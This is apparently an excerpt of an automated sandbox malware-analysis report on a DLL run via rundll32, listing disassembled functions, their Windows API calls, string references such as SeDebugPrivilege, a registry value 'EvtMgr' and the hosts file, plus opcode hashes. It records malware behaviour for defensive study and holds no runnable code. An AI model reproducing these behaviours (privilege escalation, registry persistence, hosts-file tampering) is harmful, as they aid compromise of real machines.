                                                        • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,76F90F10,?,1000AAC6,?,76F90F10,00000000,000000FF,?,00000104,?,?,?), ref: 10004C8E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: QueryValue
                                                        • String ID:
                                                        • API String ID: 3660427363-0
                                                        • Opcode ID: ffb0308163dd155646de83dd8a2210b3fab9f6e79644839b9d543c43c24d523b
                                                        • Instruction ID: c94a5b7a7e223bb3d9d1914b02920bb106f194c5d4b5f7e9879f128cbe4b1ed0
                                                        • Opcode Fuzzy Hash: ffb0308163dd155646de83dd8a2210b3fab9f6e79644839b9d543c43c24d523b
                                                        • Instruction Fuzzy Hash: FFD06CB5208342AF9704CF48D884C3BB3E9BBC9600F048D0CB59583210C730E848CB72
                                                        Function 10004CC0 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegSetValueExA.KERNEL32(?,?,?,?,?,?,10009112,?,EvtMgr,00000000,00000001,?), ref: 10004CDE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID:
                                                        • API String ID: 3702945584-0
                                                        • Opcode ID: 1e0728d56720446dc8f188b8281446978ae8e4751edbaaecc20bf0610a723b72
                                                        • Instruction ID: 4e55dd93f88442cd77918680cb2b9568ed73352474008d787238a44ed1f05354
                                                        • Opcode Fuzzy Hash: 1e0728d56720446dc8f188b8281446978ae8e4751edbaaecc20bf0610a723b72
                                                        • Instruction Fuzzy Hash: CFD0BCB5618742AF9704CF58D994C3BB7F9BBC8601F148D0CB59583254D730EC49CB62
                                                        Function 10004960 Relevance: 1.5, APIs: 1, Instructions: 14networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,?,00000000), ref: 1000497E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: InternetOpen
                                                        • String ID:
                                                        • API String ID: 2038078732-0
                                                        • Opcode ID: 32508bf2d9302bf3b3a7b54a2dd61d357e471c229301823fd5b5295839add9cb
                                                        • Instruction ID: 4735f6d36abf942a60610c31992a401985b9612102358bc0e507517b78eec5ca
                                                        • Opcode Fuzzy Hash: 32508bf2d9302bf3b3a7b54a2dd61d357e471c229301823fd5b5295839add9cb
                                                        • Instruction Fuzzy Hash: 3BD0BCB5618342AF9704CF98D994D3BB7E9BBC8600F148D0CB59583254D770E849CB62
                                                        Function 10004CA0 Relevance: 1.5, APIs: 1, Instructions: 12registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(?,?,?,?,00020019,1000AA61,80000002,1000B947,00000000,00020019,?,?,?,76F90F00), ref: 10004CB9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: a2e6794b69da438bceab8b97c139cd2b7c0f4092ddaf56f468915fc4f32291a7
                                                        • Instruction ID: 5c6c51c88c469bf1be79a4f7090ddca3a896a7fd69dbc728fef4346d028b715e
                                                        • Opcode Fuzzy Hash: a2e6794b69da438bceab8b97c139cd2b7c0f4092ddaf56f468915fc4f32291a7
                                                        • Instruction Fuzzy Hash: FCD0C5B9218201BF9A48CB58D994D2BB3E9ABC8711F00C90CB9AA83240C630E844CB22
                                                        Function 10004940 Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenA.WININET(?,?,?,?,?), ref: 10004959
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: InternetOpen
                                                        • String ID:
                                                        • API String ID: 2038078732-0
                                                        • Opcode ID: 7339e42796d01682138bb048caf6184e116aa02b7ddbc024da59192113e8da8c
                                                        • Instruction ID: 34001bf8c2cba23af082b489c03d04633ad386a3cfdfe005a800718bb59fd30e
                                                        • Opcode Fuzzy Hash: 7339e42796d01682138bb048caf6184e116aa02b7ddbc024da59192113e8da8c
                                                        • Instruction Fuzzy Hash: 22D0C5B9218201AF9A08CB98D994D2BB3E9ABC8710F00C90CB5A983240C630E805CB22
                                                        Function 10004A80 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNEL32(00000080,00000080,00000004,00000000,1000BBF2,00000000,00000000,00000000,00000002,c:\ftelcs\ReadMe.txt,40000000,00000003,00000000,00000004,00000080,00000000), ref: 10004A94
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 9876381e22d22b1458ca2fa761007b452ba81d20bd10a51ea37b9b1aad8e0387
                                                        • Instruction ID: be9a382d2b369adfd86f05014ed6db0671bf05b4c0ed29ce673cfbf6b32c1ee5
                                                        • Opcode Fuzzy Hash: 9876381e22d22b1458ca2fa761007b452ba81d20bd10a51ea37b9b1aad8e0387
                                                        • Instruction Fuzzy Hash: 11C002B9608301BFDA04CB54C888C6BBBE9FBC8350F10C90CF59983210C670E840CB22
                                                        Function 100048E0 Relevance: 1.5, APIs: 1, Instructions: 8synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateMutexA.KERNEL32(?,?,?,10008E45), ref: 100048EF
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CreateMutex
                                                        • String ID:
                                                        • API String ID: 1964310414-0
                                                        • Opcode ID: 77c65636fc826cf76c21ed1c2d636e4c276b75799d8320223db5c848b078b21e
                                                        • Instruction ID: 0f762730c69bebdb351af9c8d18ff2834a442b22ff34d7319f85fa269715e188
                                                        • Opcode Fuzzy Hash: 77c65636fc826cf76c21ed1c2d636e4c276b75799d8320223db5c848b078b21e
                                                        • Instruction Fuzzy Hash: E1C04C78204200BFDA04DB10C984C2BB7A9EBC4611F10C90CB89543210C630EC40DA11
                                                        Function 10004B10 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetShortPathNameA.KERNEL32(?,?,?), ref: 10004B1F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: NamePathShort
                                                        • String ID:
                                                        • API String ID: 1295925010-0
                                                        • Opcode ID: d75f39ea44d3613afe9b73ceb1df7c372ebca31a203f543388a093a8c34cc2c1
                                                        • Instruction ID: fb303a89878e7834feb62f1d6caf84f4d5b544132efa83a72c0d9ccc6a0791d4
                                                        • Opcode Fuzzy Hash: d75f39ea44d3613afe9b73ceb1df7c372ebca31a203f543388a093a8c34cc2c1
                                                        • Instruction Fuzzy Hash: 4AC04CB8604200BFDA04CB10C984C2BB7E9EBC4611F00C90CF88942210C674EC40DA11
                                                        Function 100014A0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(04794068), ref: 100014B6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: c2de9d88f2705f53aabbb0d8b9c739a45cf59583a08265cc16cd9615cabf7428
                                                        • Instruction ID: 1fe744c34e75f0182e43f18cf51d4d7f27cae1939632f0405d9f60eef7c226b3
                                                        • Opcode Fuzzy Hash: c2de9d88f2705f53aabbb0d8b9c739a45cf59583a08265cc16cd9615cabf7428
                                                        • Instruction Fuzzy Hash: 78B092B0800620CBE6128B6088C84473674A30C286300C101F918C3329DB34C104AF60
                                                        Function 100014D0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(04793060), ref: 100014E6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 17d20df5874ad623e024423898142ef717f44670455dd5cdfe06f1b52aee7818
                                                        • Instruction ID: 342590a968157f55c2d3ab9ebc223d1b24caf9f7faf889d873eb8d17b435457b
                                                        • Opcode Fuzzy Hash: 17d20df5874ad623e024423898142ef717f44670455dd5cdfe06f1b52aee7818
                                                        • Instruction Fuzzy Hash: D3B092B0D00620CBE6228BA088C840736A4A30C285310C001F828C3229D730C104EB20
                                                        Function 10004D10 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32First.KERNEL32(00000000,00000000), ref: 10004D1A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: dab0bdb54be907f82e8721a8c51a438edc5b27b96b71f1468851624b5224a6ea
                                                        • Instruction ID: 4a178e57590d1581f80c420128f97eb37e1fa546ae14f4cc031d9ed7fbd191d3
                                                        • Opcode Fuzzy Hash: dab0bdb54be907f82e8721a8c51a438edc5b27b96b71f1468851624b5224a6ea
                                                        • Instruction Fuzzy Hash: F4B092B5204200ABD204DB10CA84C2BB7A8AB94301B00880CF48A82110C638D840CB21
                                                        Function 10001530 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(04791050), ref: 10001546
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: f95b7281330f53e51b83d251505e5d4c8391a9795d6745fedcf749dcc6cff959
                                                        • Instruction ID: c45cdfdface6c957793686aabee11fb230d64d89d0d3144f3a3b95f933cec418
                                                        • Opcode Fuzzy Hash: f95b7281330f53e51b83d251505e5d4c8391a9795d6745fedcf749dcc6cff959
                                                        • Instruction Fuzzy Hash: B8B092B4800A20CBEA02CB608C8844B3A64A74C2423108501FA11CB224E730C000AB10
                                                        Function 10004D30 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32Next.KERNEL32(?,00000000), ref: 10004D3A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: 37f069475272b6cca200ed683fa83c91152633e7a2abff0d98add4d01afb3790
                                                        • Instruction ID: 9b545ad83a0b37dc24d19450c7bac0fd9b0d2ef5a906a719aa768e5fc7140905
                                                        • Opcode Fuzzy Hash: 37f069475272b6cca200ed683fa83c91152633e7a2abff0d98add4d01afb3790
                                                        • Instruction Fuzzy Hash: 59B09275104200ABD204DB10C984C2BB7A8BB94311B008808F48682110C634D840CB21
                                                        Function 10001590 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00FAD050), ref: 100015A6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 99775dfbb87880e4bad2e2462871a4c66be7bc6980aea6623de9670b3cc732ef
                                                        • Instruction ID: 7ffba9bd066339d4787a27611a31b7a89ef434844dc809d3f9b6a79886a0edc6
                                                        • Opcode Fuzzy Hash: 99775dfbb87880e4bad2e2462871a4c66be7bc6980aea6623de9670b3cc732ef
                                                        • Instruction Fuzzy Hash: 2CB092B0810A20DFFA128B708CC84077664A78C242350C501F811C7224EB30D0049B20
                                                        Function 10001620 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00FAA038), ref: 10001636
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: e777f6afae9d3202d58511550714f9f27a48f0d8766006cec8ea985c2988ac48
                                                        • Instruction ID: 1f812e712d3cab51f4f374bbdf571a9b0ab623a7a6a14e70690cdf80dfc874e2
                                                        • Opcode Fuzzy Hash: e777f6afae9d3202d58511550714f9f27a48f0d8766006cec8ea985c2988ac48
                                                        • Instruction Fuzzy Hash: A2B092B4800620CBE6128F608C884473764A30C241300C001F820C3234D730C118DF20
                                                        Function 100016B0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00FA7020), ref: 100016C6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: b0f384971992b4dd19b9cab97d16758f5ac948bf5790d287ab781d874b916718
                                                        • Instruction ID: 09ec16cf2d9e3bdd57d5ed2dc7f66b2880ca74239215425a520b4e140e21dc19
                                                        • Opcode Fuzzy Hash: b0f384971992b4dd19b9cab97d16758f5ac948bf5790d287ab781d874b916718
                                                        • Instruction Fuzzy Hash: ACB092B4800524CBE602CF608CC840B3BB4B70C2423008681F910C3234E730C010DB50
                                                        Function 10001710 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00FA5010), ref: 10001726
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 225bce18757dd5cce8007112facaaac45c45095e69f13463e73d82b4da326c51
                                                        • Instruction ID: dc149856e3200466590bbbbda67a89e2532640a73b18c85f34583f6dcbb6de78
                                                        • Opcode Fuzzy Hash: 225bce18757dd5cce8007112facaaac45c45095e69f13463e73d82b4da326c51
                                                        • Instruction Fuzzy Hash: 81B092B4800661CBE7228B60CCC84073B74A70C281310C141F814C3224D730C0049B60
                                                        Function 10004C60 Relevance: 1.5, APIs: 1, Instructions: 4registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,76F90F00), ref: 10004C65
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 87b4abc63f7c11ee671ef59d13ab7966a3af1181e74c4c90e5a4f0655e4d3a45
                                                        • Instruction ID: 324587ba64b1eb27d8c71780c153f5c959768cd6244882d3e4bfd9b6e5cf7741
                                                        • Opcode Fuzzy Hash: 87b4abc63f7c11ee671ef59d13ab7966a3af1181e74c4c90e5a4f0655e4d3a45
                                                        • Instruction Fuzzy Hash: A5A002F5A04610EBDE00DBA5DB8C80A77E8AB85712B408888F14AC2455C638D840DB11
                                                        Function 10004890 Relevance: 1.5, APIs: 1, Instructions: 4networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: gethostbyname
                                                        • String ID:
                                                        • API String ID: 930432418-0
                                                        • Opcode ID: b5d8a14b03fe9db19237598d9552cf8800089184801dc95bac423a48275794e4
                                                        • Instruction ID: db6d4a7ea73a3d767f21df7007ec03039420695e885c3d167e48be02809e56a4
                                                        • Opcode Fuzzy Hash: b5d8a14b03fe9db19237598d9552cf8800089184801dc95bac423a48275794e4
                                                        • Instruction Fuzzy Hash: 38A002B5F04210ABDE01DBB5CB8C80AB7E9AB85701B008844F149C2011CB3CF844DB51
                                                        Function 10004A10 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PathFileExistsA.SHLWAPI(?,1000BB9A,c:\ftelcs\ReadMe.txt,SeDebugPrivilege,00000001), ref: 10004A15
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID:
                                                        • API String ID: 1174141254-0
                                                        • Opcode ID: 4bbad5ab16995371096bde7755bc95acc338574ad108aac2567f583ec3db0265
                                                        • Instruction ID: be8fa86e2b3c3084ed518b5d3cbcd735743b859ae6c17e166df457072468833b
                                                        • Opcode Fuzzy Hash: 4bbad5ab16995371096bde7755bc95acc338574ad108aac2567f583ec3db0265
                                                        • Instruction Fuzzy Hash: D9A002B5A04210EBDE00DBA5CB8C80A77E8AB85711B008884F149C2055C678DC40DB11
                                                        Function 10004B30 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeA.KERNEL32(10019D40,1000B666,10019D40), ref: 10004B35
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: aeb22b0332fafab832228ff067b8308e6df5fd7f8217359b3bcfdca3a9fa2824
                                                        • Instruction ID: 904e3489c634dae361026f73cd365cfbe34bcbc277f6c4ad4452f4da7be1815b
                                                        • Opcode Fuzzy Hash: aeb22b0332fafab832228ff067b8308e6df5fd7f8217359b3bcfdca3a9fa2824
                                                        • Instruction Fuzzy Hash: E2A00275904210ABDE00DBA5CA8C81A77E8BFC6701B00C844F145C3110C674D854DB11
                                                        Function 00F3002A Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 00F300BE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3803214756.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_f30000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: FreeVirtual
                                                        • String ID:
                                                        • API String ID: 1263568516-0
                                                        • Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
                                                        • Instruction ID: 4228a0cc2fe9d91653ce6cdafcaba5fc4319e7f3bac4cf75caddf107112c022a
                                                        • Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
                                                        • Instruction Fuzzy Hash: 41F02EA354A3117DF618B7347C65B27BB98DF43331F150DA7EC41D6092DD15D802A6E4

                                                        Non-executed Functions

                                                        Function 100060E0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 94stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strrchr.MSVCRT ref: 1000615E
                                                        • strncpy.MSVCRT ref: 10006175
                                                        • strncpy.MSVCRT ref: 1000617F
                                                        • GetSystemInfo.KERNEL32(?), ref: 10006189
                                                        • GetCurrentProcess.KERNEL32(00000020,?), ref: 100061AA
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 100061B1
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 100061C2
                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 100061F7
                                                        • CloseHandle.KERNEL32(00000010), ref: 10006202
                                                        • sscanf.MSVCRT ref: 1000622D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ProcessTokenstrncpy$AdjustCloseCurrentHandleInfoLookupOpenPrivilegePrivilegesSystemValuesscanfstrrchr
                                                        • String ID: %[^$SeDebugPrivilege$c:\ftelcs$etc\hosts
                                                        • API String ID: 3677170833-2241817278
                                                        • Opcode ID: 766fc4c91f3afb022d82f0411d261274f1b7f6a8cc47e5443cc1c5075a28d2e0
                                                        • Instruction ID: cdf063d2dc35dfdd6761936bd61a376c098a1b861acc190fde3f69951cd82382
